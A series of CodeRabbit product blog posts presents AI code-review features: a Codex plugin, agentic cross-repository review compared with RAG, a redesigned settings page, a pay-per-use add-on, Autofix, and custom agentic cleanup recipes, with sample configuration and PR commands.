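The five steps above can be pictured as a small decision flow. The sketch below is illustrative only: the `ReviewEnv` shape, the severity labels, and the function names are assumptions made for this example, not the plugin's actual interface.

```typescript
// Hypothetical shapes for illustration; the real plugin and CLI may differ.
type Severity = "critical" | "major" | "minor";

interface Finding {
  file: string;
  severity: Severity;
  message: string;
}

interface ReviewEnv {
  cliInstalled: boolean;      // step 2: is the CLI available?
  signedIn: boolean;          // step 2: is the user authenticated?
  runReview: () => Finding[]; // step 3: run the review on the current changes
}

type ReviewOutcome =
  | { kind: "needs-install" }
  | { kind: "needs-sign-in" }
  | { kind: "findings"; findings: Finding[] };

// Lower rank sorts first, so the most severe findings lead the list.
const SEVERITY_RANK: Record<Severity, number> = { critical: 0, major: 1, minor: 2 };

function reviewCurrentChanges(env: ReviewEnv): ReviewOutcome {
  if (!env.cliInstalled) return { kind: "needs-install" };
  if (!env.signedIn) return { kind: "needs-sign-in" };
  // Step 4: copy the results, then order them by severity.
  const findings = env
    .runReview()
    .slice()
    .sort((a, b) => SEVERITY_RANK[a.severity] - SEVERITY_RANK[b.severity]);
  return { kind: "findings", findings };
}
```

Modeling the outcome as a tagged union keeps the "install", "sign in", and "here are your findings" cases explicit, which mirrors how the flow only asks for user input when sign-in is actually needed.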
That first run experience is a big part of the value. On setup, the plugin guides the agent to check for required tooling, install it when needed, and only ask for user input when account sign in is necessary. The result is that review can stay closer to the work itself, which makes it easier for developers to act on findings immediately and for teams to move through review with less friction. ## Prerequisites Before installing the plugin, make sure you have:

**CodeRabbit CLI installed.** Install it globally by running:
```
curl -fsSL https://cli.coderabbit.ai/install.sh | sh
```
Restart your shell after installation to make sure the CLI is available.
**A CodeRabbit account.** You need to be authenticated before running reviews. You can sign in or [get started](https://app.coderabbit.ai/login?free-trial=&utm_source=blog&utm_medium=article&utm_campaign=%3Cblog-signups%3E&utm_term=%3Ccr-cntnt%3E&utm_content=%3Call-blgs%3E) by running the authentication command within Codex and completing sign-in in the browser when prompted. The [CodeRabbit CLI](https://docs.coderabbit.ai/cli) is free to use, with [rate limits](https://docs.coderabbit.ai/cli#pricing-and-capabilities) on the free tier.

## Installation Codex supports plugin installation from the Plugin Directory in both the app and the CLI. The steps differ slightly depending on where you are working. ### In the Codex app: 1. Open *Plugins* from the sidebar. 2. Search for CodeRabbit and select Add to Codex. 3. If prompted, complete authentication during setup. ### In the Codex CLI: 1. Run `codex` and open `/plugins`. 2. Search for CodeRabbit and select Install plugin. 3. If prompted, complete authentication during setup. ### After installation: 1. Start a new thread and ask Codex to review your current changes. You can also type `@coderabbit` to invoke the plugin directly. 2. If you have not yet authenticated, the plugin will guide Codex through the sign-in process on first use. You will know the installation worked when Codex can recognize the review request, route it through CodeRabbit, and return findings inside the same session. The workflow works from both the Codex app and the CLI, so you can run reviews wherever you are already working. ## What Comes Next This first version is a starting point. We plan to keep refining how review feedback flows back into the agent and to expand the plugin with new skills as the workflows mature. Because users get updates through the plugin itself, new capabilities arrive without any extra setup. If you try it, we would love to hear how it goes. Tell us what to improve next in the [CodeRabbit subreddit](https://www.reddit.com/r/coderabbit/) or the [CodeRabbit Discord](https://discord.com/invite/coderabbit).

Why agentic code review beats RAG for multi-repository analysis

Sahana Vijaya Prasad — Tue, 14 Apr 2026 00:00:00 GMT

Software development today is rarely limited to a single repository. A complex system might involve a microservices backend, a shared type library, a frontend application, and an integration test suite, all living in separate repositories. Because of this, changing an API signature in one repository can quietly break consumers in several others. ![Flowchart illustrating how API signature changes propagate across interdependent software repositories.](https://victorious-bubble-f69a016683.media.strapiapp.com/newimageforblogmulti_202ac3062e.png) Figure 1: Modern systems span multiple repositories — a change in one can silently break others Traditional code review tools treat each pull request as an isolated unit. When a reviewer catches a cross-repo breaking change, it usually happens because they already understand the system, not because the tooling surfaced it. The real question for [engineering leaders evaluating code review tools](https://www.coderabbit.ai/blog/framework-for-evaluating-ai-code-review-tools) is simple: how does the tool understand impact across repository boundaries? The answer exposes a fundamental architectural divide between tools that rely on pre-built vector indexes and tools that actively explore your code at review time. ## At CodeRabbit, we’ve been building agents since 2024 Before explaining why agentic systems win for cross-repo analysis, it’s worth being direct: CodeRabbit has been building and running this kind of agent-based validation loop since 2024, before this architectural pattern became industry consensus. The approach wasn’t inspired by [Anthropic’s “Building Effective Agents” guide](https://www.anthropic.com/research/building-effective-agents) or [Google Cloud’s writings on Agentic RAG](https://cloud.google.com/resources/core-concepts-ai-agents). Those publications validated what we had already learned in practice: that code review across repository boundaries is fundamentally an investigation problem, not a retrieval problem. 
You can’t pre-index your way to the right answer when you don’t know in advance which files matter. Here’s a concrete example of the kind of validation script our agent generates when reviewing cross-repo impact:

```
// Agent-generated validation: UserService.createUser signature change
// PR: auth-service #1423 — adds required roleId parameter
const impactedCallSites = [
  {
    repo: "org/backend-api",
    file: "src/controllers/admin.ts",
    line: 45,
    currentCall: "userService.createUser(email, name)",
    issue: "Missing required roleId argument — will throw at runtime",
    severity: "breaking"
  },
  {
    repo: "org/backend-api",
    file: "src/controllers/onboarding.ts",
    line: 112,
    currentCall: "createUser({ ...userPayload })",
    issue: "Spread object may not include roleId — needs verification",
    severity: "warning"
  },
  {
    repo: "org/integration-tests",
    file: "tests/fixtures/user-factory.ts",
    line: 23,
    currentCall: "UserService.createUser(email, name)",
    issue: "Test fixture calls old signature — will fail in CI",
    severity: "breaking"
  }
];
```

This is what the agent produces: precise, file-level findings grounded in live code, not a list of semantically similar snippets. The rest of this post explains why that difference is architectural, and why tools that still rely solely on RAG pipelines can’t replicate it.

## How most code review tools approach cross-repo context

The dominant pattern follows the RAG pipeline:

1. **Index:** Code from related repositories is periodically chunked, converted into numerical representations (embeddings), and stored in a vector database.
2. **Retrieve:** When a PR is opened, the changed code is similarly converted, and a nearest-neighbor search returns the most mathematically similar chunks from the index.
3. **Generate:** The AI receives those retrieved chunks alongside the PR diff and produces its review.

This approach is well-understood and broadly adopted.
[Forrester’s analysis](https://www.forrester.com/blogs/forresters-guide-to-retrieval-augmented-generation-rag/) confirmed RAG as the default architecture for enterprise knowledge assistants. But [research has identified structural weaknesses](https://arxiv.org/abs/2501.09136) that are particularly acute when the task is code review across repositories — a domain where precision matters and false confidence is dangerous. ## The five limitations of RAG-based code review ### 1. The retrieval bottleneck When the initial search misses the relevant code, due to semantic mismatch, poor chunking that splits a function across two fragments, or because the relationship is structural rather than textual, the system has no recovery mechanism. For code review, this means: if the vector search doesn’t find the downstream consumer of the API you just changed, the tool won’t tell you it exists. No second chance, no alternative strategy. Industry data underscores the severity: [NVIDIA’s technical blog reports](https://developer.nvidia.com/blog/traditional-rag-vs-agentic-rag-why-ai-agents-need-dynamic-knowledge-to-get-smarter/) that standard RAG “retrieves once and generates once, searching a vector database, grabbing the top-K chunks, and hoping the answer is in those chunks.” When that single shot misses, the entire review is compromised. ### 2. Consistency and synchronization gaps Modern vector databases have significantly reduced raw indexing latency, with many now offering updates in mere seconds. But “fresh” infrastructure doesn’t guarantee correct or complete context. RAG pipelines still depend on multiple steps: detecting changes, re-chunking files, recomputing embeddings, and updating indexes. 
In multi-repository systems, this compounds: * New consumers may not yet be indexed * Renamed symbols can exist under conflicting embeddings * Cross-repo relationships aren’t updated atomically The consequence of relying on incomplete or inconsistent analysis in code review is often false confidence. Agentic systems circumvent this risk by analyzing the code live at the time of review. ### 3. Context poisoning A common problem in code analysis is that semantically similar retrieved information often lacks true relevance, contaminating the AI's reasoning. [Anthropic’s engineering team](https://www.anthropic.com/engineering/effective-context-engineering-for-ai-agents) has documented this as “context rot.” In code review, this manifests as confident-sounding analysis grounded in the wrong code which is arguably worse than no analysis at all. ### 4. Inability to follow references Code relationships are fundamentally structural, not semantic. For instance, a function call, an import statement, or a reference to a protobuf schema represents a graph relationship, a structure that similarity search methods struggle to identify. If a shared type definition is modified, the critical factor is identifying the code that imports it, rather than finding code chunks that are merely textually similar. ### 5. No reasoning, only matching A vector search can find code that looks like the code you changed. It cannot determine that src/controllers/admin.ts:45 calls userService.createUser(email, name) with two arguments while your PR changes the signature to require three. That requires reading the code, understanding the call site, and reasoning about the mismatch. 
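To make the "reasoning, not matching" point concrete, here is a minimal sketch of the argument-count check described above. It is a deliberately naive illustration, not CodeRabbit's implementation: `countArgs`, `findBreakingCalls`, and the `CallSite` shape are hypothetical names, and the parser only splits on top-level commas (it ignores commas inside string literals and cannot see inside a spread object).

```typescript
// Hypothetical call-site record for illustration.
interface CallSite {
  file: string;
  line: number;
  call: string; // source text of the call expression
}

// Count top-level arguments in a call such as "f(a, g(b, c))".
// Naive: tracks bracket depth but does not understand string literals.
function countArgs(call: string): number {
  const open = call.indexOf("(");
  const close = call.lastIndexOf(")");
  if (open === -1 || close <= open) return 0;
  const inner = call.slice(open + 1, close).trim();
  if (inner === "") return 0;
  let depth = 0;
  let count = 1;
  for (let i = 0; i < inner.length; i++) {
    const ch = inner.charAt(i);
    if (ch === "(" || ch === "[" || ch === "{") depth++;
    else if (ch === ")" || ch === "]" || ch === "}") depth--;
    else if (ch === "," && depth === 0) count++;
  }
  return count;
}

// Keep only the call sites that pass fewer arguments than the new signature requires.
function findBreakingCalls(sites: CallSite[], requiredParams: number): CallSite[] {
  return sites.filter((site) => countArgs(site.call) < requiredParams);
}
```

Even this toy check needs the actual call text in hand, which is the point: a similarity score over embeddings carries no notion of "two arguments where three are required." A real analysis would work from a parsed syntax tree and type information rather than string scanning.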
## The industry shift toward agentic systems

Anthropic drew the clearest line in its influential [“Building Effective Agents” guide](https://www.anthropic.com/research/building-effective-agents), which recommends agents for open-ended problems where "it's difficult or impossible to predict the required number of steps." Cross-repository impact analysis fits that description precisely.

[OpenAI released the Agents SDK](https://openai.com/index/new-tools-for-building-agents/) in March 2025 for scenarios where teams shifted “from prompting step-by-step to delegating work to agents.”

[Google Cloud stated it most directly:](https://cloud.google.com/resources/core-concepts-ai-agents) “The most powerful approach to grounding is Agentic RAG, where the agent is no longer a passive recipient of information but an active, reasoning participant in the retrieval process itself.”

These publications reflect where the industry is converging. They also describe exactly what CodeRabbit has been doing since 2024.

## CodeRabbit’s approach: Agentic, real-time exploration

CodeRabbit’s multi-repository analysis embodies the agentic architecture. Rather than pre-indexing code into static representations and hoping the right chunks surface at query time, CodeRabbit deploys an autonomous research agent that actively explores linked repositories in real time.

### How it works

Configuration is simple.
Teams declare which repositories are related:

```
knowledge_base:
  linked_repositories:
    - repository: "org/backend-api"
      instructions: "Contains REST API consumers of shared types"
    - repository: "org/integration-tests"
      instructions: "End-to-end test fixtures"
```

When a PR is opened, the agent executes a multi-step research strategy:

* Reads the PR context to understand what changed and which APIs, interfaces, types, or dependencies are affected
* Identifies which related repositories might be impacted, using pre-computed architectural summaries
* Explores those repositories in real time — cloning them on demand into isolated sandboxed environments
* Reflects on what it finds and adapts its search strategy — trying the type name, import path, or dependency declarations if the first search returns nothing
* Summarizes only findings directly relevant to the review, with precise file paths and line numbers

![Flowchart illustrating the Apollo Anti-Refactoring Review process, from PR context to reporting findings.](https://victorious-bubble-f69a016683.media.strapiapp.com/agentic_multi_repository_review_fbbca3e961.png)

Figure 2: CodeRabbit’s agentic review flow — iterates until it has verified evidence

### What the agent finds that RAG cannot

Consider a Pull Request that modifies the `UserService.createUser` method signature in the `auth-service` repository, introducing a mandatory `roleId` parameter. While a RAG-based tool can identify code fragments containing the string "createUser," it lacks the capability to determine if these call sites will actually fail due to the signature change.

backend-api (org/backend-api)

* `src/controllers/admin.ts:45` — calls `createUser(email, name)` without `roleId`. Will break after the signature change.
* `src/controllers/onboarding.ts:112` — calls `createUser` with a spread object, which may need updating.

integration-tests (org/integration-tests)

* `tests/fixtures/user-factory.ts:23` — creates users via old signature. Will fail in CI.

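The "reflect and adapt" step of the research strategy described in this section can be pictured as a loop over fallback searches. The following is a minimal sketch under stated assumptions: the in-memory `RepoFiles` map stands in for a cloned repository, and `grep`, `exploreWithFallback`, and `SearchAttempt` are hypothetical names for this example rather than CodeRabbit internals.

```typescript
// Hypothetical in-memory stand-in for a cloned repository: path -> file contents.
type RepoFiles = Record<string, string>;

interface SearchAttempt {
  strategy: string; // label for the kind of search, e.g. "method name"
  query: string;    // literal text to look for
}

interface SearchResult {
  strategy: string;
  files: string[];
}

// Return the paths of files whose contents include the query (a toy grep).
function grep(repo: RepoFiles, query: string): string[] {
  return Object.keys(repo).filter((path) => repo[path].indexOf(query) !== -1);
}

// Try each strategy in order and stop at the first one that finds evidence.
function exploreWithFallback(repo: RepoFiles, attempts: SearchAttempt[]): SearchResult | null {
  for (let i = 0; i < attempts.length; i++) {
    const files = grep(repo, attempts[i].query);
    if (files.length > 0) {
      return { strategy: attempts[i].strategy, files };
    }
  }
  return null; // no strategy produced a hit
}
```

A single-shot retrieval corresponds to running only the first attempt. The loop is what gives the agent a second chance, for instance when a consumer imports the type under an alias and never mentions the method name directly.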
The difference is not incremental. It is the difference between “here are some similar code chunks” and “here are the three call sites that will break, with file paths and line numbers.”

## Head-to-head: Agentic vs. RAG-based multi-repo review

| Dimension | RAG-based review tools | CodeRabbit (Agentic) |
| :---- | :---- | :---- |
| Data freshness | Reflects last index build (hours to days old) | Live code at HEAD, always current |
| Recovery from missed results | None; single-shot retrieval with no fallback | Agent iterates: tries alternative searches, follows references, reads files to verify |
| Understanding code relationships | Textual similarity only; cannot follow imports, call graphs, or type hierarchies | Navigates code structurally: greps for imports, reads call sites, follows type definitions |
| Reasoning about impact | Returns similar chunks; cannot reason about whether a call site will break | Reads code, counts arguments, checks type compatibility, and reasons about actual impact |
| Handling ambiguity | Returns top-k results regardless of confidence | Agent reflects on result quality, runs refined searches when uncertain, stops when self-contained |
| Precision of findings | Code chunks (often partial, sometimes irrelevant) | Specific files, line numbers, and explanations of why the finding matters |
| Security model | Requires persistent index of your code in external services | On-demand cloning into isolated sandboxes; no persistent code storage |

## Why this matters for engineering leaders

Major industry players like Anthropic, OpenAI, Google, and Microsoft are all investing heavily in agentic infrastructure, including MCP, Agents SDK, Agent Development Kit, and the A2A Protocol. This consensus signals a clear direction for AI-powered tooling: autonomous, reasoning systems are poised to replace static retrieval pipelines.

Cross-repository code review requires: * Open-ended exploration: The tool doesn’t know in advance which files matter * Structural understanding: The relationships that matter are imports, call sites, and type hierarchies, not textual similarity * Reasoning under uncertainty: The tool must determine whether a change breaks a consumer, not just find similar code * Real-time accuracy: Stale results in code review create false confidence, which is worse than no results Retrieval-Augmented Generation (RAG) is fundamentally mismatched for multi-repository code review. RAG excels at question-answering by grounding LLMs in a knowledge base, but analyzing code across repositories demands an investigative approach, not mere knowledge retrieval. CodeRabbit’s choice to use an agentic architecture for cross-repository impact analysis isn’t a response to industry trends. It’s what we built because it’s the only architecture that actually solves the problem. The industry is catching up to where we’ve been since 2024\. Want to see CodeRabbit’s cross-repository analysis in action? [Try it for free on your next PR](https://coderabbit.link/NcmblIe).

Our settings page was overwhelming our users. Here's what we did to fix it

Sahana Vijaya Prasad — Fri, 10 Apr 2026 00:00:00 GMT

CodeRabbit reviews code across every language, framework, and team size. Solo developers shipping side projects. Enterprises enforcing compliance across hundreds of repositories. That range means a lot of configuration knobs. More than a 2004 Honda Civic dashboard, certainly. Every setting exists because someone needed it. Path-specific review instructions, tool-level toggles, draft PR handling, labeling rules, tone control. Each one is a dealbreaker for somebody. Remove it and you lose them. Keep it and the settings page grows. Over time, our settings page became a wall of options that overwhelmed a lot of users — especially those new to CodeRabbit. Here's how we solved it and what we learned along the way. ## Who's actually in the settings page? Before changing anything, we looked at who was using the settings and what they were doing there. Four patterns showed up. 1. **The "just make it work" user.** They install CodeRabbit, maybe change the review language, and never come back. They want sensible defaults and the confidence that they're not missing anything important. 2. **The hands-on developer.** They spend fifteen minutes tuning things: adjusting the tone, setting up path-specific instructions, toggling walkthrough sections. Then they leave it alone. 3. **The platform team.** Enterprises with compliance requirements and standards enforced across every repo. They need access to everything because their use cases are the edge cases. 4. **The "config as code" user.** They don't want a UI at all. They want a YAML file in version control, reviewed in a PR, applied automatically. Configuration is infrastructure. A challenge for our team was recognizing that these weren't fixed user segments. A single user might belong to the "just works" group on Monday and the "config as code" group on Friday. ## **Why we couldn't just add an "Advanced" toggle** The obvious fix for settings overload is a simple view with an "Advanced settings" toggle. 
We tried it, but it didn't work for a couple of reasons. Our settings UI is generated directly from a JSON schema — the same schema that powers every `.coderabbit.yaml` file across millions of repositories. When a developer adds a property to the schema, the UI renders it automatically, without any additional frontend work. We didn't want to lose that. Bolting "basic" and "advanced" flags onto the schema would have added complexity to the one system we'd kept simple. But the deeper problem was simpler than architecture. We couldn't agree on what was basic versus advanced. Is "Auto-assign reviewers" a basic setting or an advanced one? For a solo developer it's a niche toggle; for an enterprise team it's a critical workflow. The basic/advanced split assumes users fall on a single axis of sophistication. Ours don't. A setting that's advanced for one persona is table stakes for another. ## Three views, one truth Since we couldn't restructure the schema or agree on two tiers, we tried something else: decoupling how settings are presented from how they're stored. We built three views over the same configuration. 1. **Concise** is the default. It shows a curated subset — the settings the vast majority of users actually change. We picked them based on usage data, support signals, and direct user feedback. The grouping is different from the schema too; "Behavior" pulls settings from multiple schema sections because that's how users think about them. 2. **All settings** show everything. Same auto-generated UI from the schema, same grouping as the YAML structure. The platform team that needs tool-specific rules or knowledge base settings finds it all here. 3. **YAML editor** is a Monaco editor with schema validation. Edit configuration as code, in the browser, with real-time error checking. All three read from and write to the same data. This shifted the conversation from "is this basic or advanced?" to "do most users need to see this?" 
without needing to maintain a separate schema. ## Making settings tangible Three views solved the structure problem, but there was a deeper issue: settings are abstract. "Enable sequence diagrams" means nothing if you don't know what a sequence diagram looks like in a PR review. So we added a live preview panel. It shows a mock PR review comment right next to the settings. ![Comparison of PR author-generated summary and AI-generated summary by CodeRabbit.](https://victorious-bubble-f69a016683.media.strapiapp.com/image4_338b48052c.png) ![GitHub pull request page displaying a sequence diagram, file changes, and estimated review effort.](https://victorious-bubble-f69a016683.media.strapiapp.com/image3_516520fd32.png) Toggle "sequence diagrams" off and the diagram disappears from the preview. Settings tagged with "Preview" tell the user which ones have a visible effect — instead of configuring blindly, users can see the result before they save. ![Dark UI settings panel with multiple options and active orange toggle switches.](https://victorious-bubble-f69a016683.media.strapiapp.com/image2_b7f9435168.png) This solved one of the bigger problems that reorganizing the settings alone couldn't, which is users didn't understand what the settings controlled. ## **What we learned** Settings pages aren't glamorous. But get them wrong and every power user you have will feel it. Here are the three things that stuck with our team after this process and how we'll take it into our next redesign. 1. **There's no single right view for all users.** A solo developer and an enterprise platform team need fundamentally different things from the same settings page. What worked was giving them different paths to the same configuration and making transitions between them seamless. Someone who starts in Concise and can't find what they need should land in All Settings smoothly — not hit a dead end. 2. 
**Structure alone doesn't solve confusion.** We spent a lot of time on organization and grouping, but the preview panel ended up being one of the most impactful changes, and it had nothing to do with structure. Showing the output next to the input made settings concrete in a way that descriptions never could. 3. **Protect what already works.** We could have restructured the schema to make the UI cleaner. It would have broken every `.coderabbit.yaml` file out there. Keeping the data layer stable and putting the flexibility in the presentation layer let us ship a completely different experience without introducing regressions elsewhere. Ready to try it yourself? Start your [free trial of CodeRabbit](https://coderabbit.link/NcmblIe).

Your plan has a limit. Your sprint doesn't have to.

Konrad Sopala — Thu, 09 Apr 2026 00:00:00 GMT

Think about your last big sprint. You're pushing through a high-velocity release. The whole org is shipping in parallel. Large PRs are stacking up. CodeRabbit has been reviewing everything, keeping pace as always. Then it stops: you've hit your plan's review limit. You start asking: Now what? Do we wait for the reset? Should half the team pause? Are we merging without review? Now you have another way to handle that.

## Meet the PR Usage-based Add-on

The PR Usage-based Add-on lets your team keep reviewing PRs even after hitting a subscription limit, without upgrading your plan, manual intervention, or per-reviewer setup. Once enabled through the CodeRabbit dashboard, the rabbit automatically continues processing PR reviews beyond the limit, billing only the over-limit usage as pay-per-use. Credits kick in after the limit is reached, not before. Your regular usage stays on your plan. Only the overflow gets charged.

## How it actually works

The mental model is simple. Your subscription covers your baseline. If your team has a burst, such as a large rollout, a complex refactoring sprint, or an unusually active week, the add-on acts as a pressure valve.

%[https://youtu.be/-2kRP1qp61I]

Here's what happens:

- Within your plan limit: Everything works exactly as it always has. No changes, no credits touched.
- Over your plan limit, add-on enabled, credits available: CodeRabbit continues reviewing, charges pay-per-use for each over-limit review, and keeps going. Developers see no interruption.
- Over your plan limit, add-on disabled: Developers get a clear message that the rate limit has been reached and that an admin can enable credit-based usage to continue.
- Over your plan limit, add-on enabled but credits insufficient: Developers get a clear message to contact the admin to purchase more credits.

No silent failures, and no reviews quietly dropping.

## Who controls it

Admins manage the add-on from the CodeRabbit dashboard via an org-level pay-per-use toggle.
Reviewers don't need a separate billing configuration. They don't need to do anything differently per PR. Once an admin enables the add-on, the system handles the rest.

Speaking of which: if your team uses the CodeRabbit CLI to trigger reviews, the same rules apply. CLI-originated reviews follow the same billing path and the same opt-in logic as reviews from GitHub, GitLab, or Bitbucket PR pages. You don't manage two different systems. There's one toggle, one credit balance, and one billing path.

## Why not just upgrade the plan?

You could. But not every team that occasionally bursts past their limit actually needs a higher tier month after month.

![Usage-based add-on features: real-time API monitoring, full control, flexible options, and a 'Try it now' button.](https://victorious-bubble-f69a016683.media.strapiapp.com/Screenshot_2026_04_09_at_7_01_51_AM_e1aac83db6.png)

Big sprints, org-wide rollouts, and genuinely gnarly PRs are irregular events. Paying for a permanently higher plan to handle occasional spikes isn't the right trade-off for every team. The add-on is designed for exactly that. You pay for what you use, when you use it.

## Getting started

The PR Usage-based Add-on is available now. Head to your CodeRabbit dashboard, turn on pay-per-use in org settings, and make sure you have credits loaded.

[Get started with CodeRabbit](https://coderabbit.link/C3yHp2s)

You don’t need to implement that. Autofix will.

Konrad Sopala — Thu, 02 Apr 2026 00:00:00 GMT

You open a pull request. CodeRabbit reviews it and leaves a handful of comments. So now you do what every developer does:

* Read each comment
* Context-switch back into the code
* Make the fix
* Push a new commit

And wait for CI to run again. Multiply that by a dozen PRs a week and it adds up fast. Why do it by hand at all? The review already told you exactly what to change.

## Meet Autofix

When CodeRabbit leaves review comments with clear fix instructions, [Autofix](https://docs.coderabbit.ai/finishing-touches/autofix) can implement them for you.

### The old way

Until now, the way forward was copy-pasting our Prompt for AI Agents block into your tool of choice.

![GitHub code review screen shows 10 actionable AI-generated comments on code changes.](https://victorious-bubble-f69a016683.media.strapiapp.com/prompt_for_ai_agents_d3579272ad.png)

### The new way

Now you trigger Autofix and it applies all unresolved findings in one go.

%[https://youtu.be/tCbpNbdHdbo]

You get two options for how the fixes land:

* **Commit to your current branch**: fixes get pushed directly to the PR you’re already working on
* **Open a stacked PR**: if you want to review the fixes independently before they touch your branch (a new PR is created from your feature branch)

**Either way, nothing merges automatically**. You review the changes like any other code and decide what ships.

## How it works

### Comment in the PR

To apply fixes directly to your branch:

```plaintext
@coderabbitai autofix
```

To open a separate PR with the fixes:

```plaintext
@coderabbitai autofix stacked pr
```

Both also accept `auto-fix` and `auto fix` if you forget the exact spelling, because nobody should have to remember whether it’s one word or two.

### Checkbox in the PR walkthrough

In GitHub flows, CodeRabbit renders an **Autofix** section directly inside the review comment with interactive checkboxes. Check the box and it runs, no command needed.
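Returning to the comment commands for a moment: the tolerant spelling rule (`autofix`, `auto-fix`, `auto fix`) is easy to picture as a small parser. This is only a sketch of how such matching could work, not how CodeRabbit actually parses comments; `parseAutofixCommand` and `AutofixMode` are hypothetical names, and the case-insensitive matching is an assumption.

```typescript
// Hypothetical result type: where the generated fixes should land.
type AutofixMode = "commit" | "stacked-pr";

// Accepts "autofix", "auto-fix", or "auto fix", optionally followed by "stacked pr".
// Assumption: matching is case-insensitive and the command ends the comment.
const AUTOFIX_PATTERN = /@coderabbitai\s+auto[- ]?fix(\s+stacked\s+pr)?\s*$/i;

function parseAutofixCommand(comment: string): AutofixMode | null {
  const match = AUTOFIX_PATTERN.exec(comment.trim());
  if (match === null) return null; // not an autofix command
  // The optional capture group is present only for the stacked-PR variant.
  return match[1] ? "stacked-pr" : "commit";
}
```

Returning `null` for anything that does not match keeps unrelated mentions, such as a request for a regular review, from triggering code changes by accident.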
![GitHub interface showing coderabbitai bot's actionable comments and options for AI review, autofix.](https://victorious-bubble-f69a016683.media.strapiapp.com/autofix_checkbox_e09f5e02ea.png) ## What happens when you trigger Autofix When Autofix runs, here’s what’s happening under the hood: * **Scans unresolved threads**: CodeRabbit looks at all the review comments it created on the PR and identifies the ones that are still unresolved. * **Gathers fix instructions**: each CodeRabbit review comment includes a structured “Prompt for AI Agents” block with specific instructions, which Autofix collects * **Applies the change**: a coding agent implements the fixes with full repository context. * **Runs verification**: it executes a repository setup and build verification step to check that the fixes don’t break anything. * **Delivers the result**: even if verification fails, Autofix still delivers the generated changes so you can continue iterating. You’re never left empty-handed. The whole point is to preserve your review workflow, not replace it. Autofix generates the diff and you decide whether it’s correct. ## Even though it’s auto you can still control it if you want Autofix processes all unresolved CodeRabbit review comments. If there’s a specific comment you *don’t* want it to touch - maybe you disagree with the suggestion, or you want to handle it differently - just resolve that comment manually before running Autofix. Hit the “Resolve conversation” button on GitHub, then trigger the command. Autofix will skip it. This keeps you in control. Autofix is aggressive about applying what’s open, but it respects what you’ve explicitly closed. ## Try it out Autofix is available on GitHub and GitLab as an open beta for CodeRabbit Pro Plan users. If you’re tired of implementing review feedback that’s already been spelled out for you, give it a try. Comment on your next PR and see what comes back. [Get started with CodeRabbit](https://coderabbit.link/Q5oy5FI)

Why do that stuff manually when you have Custom Finishing Touch recipes?

Konrad Sopala — Thu, 26 Mar 2026 00:00:00 GMT

Go check your pull requests real quick. If you’re like most devs, there’s at least one PR in there that’s almost done. The feature works, the logic makes sense, tests pass locally. If someone asked whether it was finished, you’d probably say, “Yeah... pretty much.” And yet it’s still open. ![](https://cdn.hashnode.com/uploads/covers/695d7ae2e2a2e9cdf5199232/80ce4a55-e521-451c-8e92-b7c6029b9fde.png align="center") Picture above courtesy of [https://dev.to/linearb/dev-interrupteds-best-programmer-humor-36ck](https://dev.to/linearb/dev-interrupteds-best-programmer-humor-36ck) Why? Because every team has the same recurring review comments. Enforce import ordering. Tighten TypeScript types. Apply project-specific conventions. Add missing docstrings. The list goes on. These tasks are important, but they’re also repetitive and they’re the reason PRs sit open longer than they need to. What if you could generate what’s missing and open a reviewable change, all from within the PR itself? ## What are Finishing Touches? Let’s do a short terminology intro before we dive into the core. [Finishing Touches](https://docs.coderabbit.ai/finishing-touches) is a set of features that includes [Custom Finishing Touch recipes](https://docs.coderabbit.ai/finishing-touches/custom-finishing-touches). 
At a high level, those are one-click agentic actions that polish and extend your PRs, handling the following:

* Resolving [merge conflicts](https://docs.coderabbit.ai/finishing-touches/resolve-merge-conflict)
* Generating [unit tests](https://docs.coderabbit.ai/finishing-touches/unit-test-generation)
* [Automatically implementing fixes](https://docs.coderabbit.ai/finishing-touches/autofix) for review findings
* [Simplifying code](https://docs.coderabbit.ai/finishing-touches/simplify)
* Generating [docstrings](https://docs.coderabbit.ai/finishing-touches/docstrings)

And finally, [running custom agentic code](https://docs.coderabbit.ai/finishing-touches/custom-finishing-touches) on your PRs, which this blog is all about.

## Introducing: Custom Finishing Touch recipes

Every team has its own recurring cleanup patterns - things that standard linters don’t catch and that come up in review after review. Custom Finishing Touch recipes let you define reusable, named instructions that run agentic code changes against your pull requests.

They’re perfect if you:

* See the same hygiene comments across PRs.
* Enforce project-specific conventions beyond standard linters.
* Want fewer back-and-forth review cycles.
* Don’t want to slow down your developers

### How it works

You can set it up in two different ways:

* [Through CodeRabbit YAML File](https://docs.coderabbit.ai/getting-started/yaml-configuration)

You define recipes inside `.coderabbit.yaml` like this:

```plaintext
reviews:
  finishing_touches:
    custom:
      - name: "cleanup stale imports"
        instructions: |
          Scan the changed files for unused imports and remove them.
          Preserve imports used in type positions.
          Do not reorder existing imports; only remove stale ones.
```

Then you trigger it directly in a pull request:

```plaintext
@coderabbitai run cleanup stale imports
```

CodeRabbit runs the recipe and opens a new pull request with the result. You review it like any other PR.

Want to experiment before committing a recipe to your config?
Run an ad hoc evaluation:

```plaintext
@coderabbitai evaluate custom finishing touch --name "sort imports" --instructions "Sort all import statements alphabetically within each import group in the changed files."
```

Same execution model, nothing persisted, which is useful for one-off tasks and testing ideas before you formalize them.

* [Through CodeRabbit Web Interface](https://app.coderabbit.ai/organization/settings/review/finishing-touches)

Click on Organization Settings in the left sidebar and head to Finishing touches. From there you’ll be able to add your custom recipes.

![](https://cdn.hashnode.com/uploads/covers/695d7ae2e2a2e9cdf5199232/2fd1d7ae-0adc-40b3-b34f-6c372921756e.png align="center")

### Core tips

You can define up to five recipes per repository. Recipe names are case-insensitive and you can disable a recipe without deleting it.

## What actually happens behind the scenes

When you trigger a recipe, CodeRabbit does more than run a simple script. It clones your repository into an isolated sandbox and provides the agent with full PR context, including the title, description, summary and objectives. It also pulls in your global coding guidelines from *reviews.path\_instructions*, so the agent follows the same conventions your team already agreed on. From there, the agent has controlled repository access through Read, Write, Edit, Glob, Grep, and Bash tools. It executes your instructions and opens a new pull request against your branch with the proposed changes.

%[https://youtu.be/_0jBjDqIF1U?si=_875EzFGOfWQzbU3]

Nothing merges automatically or silently modifies your branch. You review the diff like any other PR and decide what ships.

## Try it out

Custom Finishing Touch recipes are available on GitHub in early access for Pro plan users, with GitLab and Bitbucket support coming soon. If your team keeps leaving the same cleanup comments in pull requests, give it a try.

Pointing out what's missing is only half the job.
If the cleanup is still manual, the bottleneck is still there. We want to get rid of it. [Get started with CodeRabbit.](https://app.coderabbit.ai/login???free-trial)

A very brief history of AI coding, from Copilot to next-gen agents

David Kravets — Wed, 18 Mar 2026 00:00:00 GMT

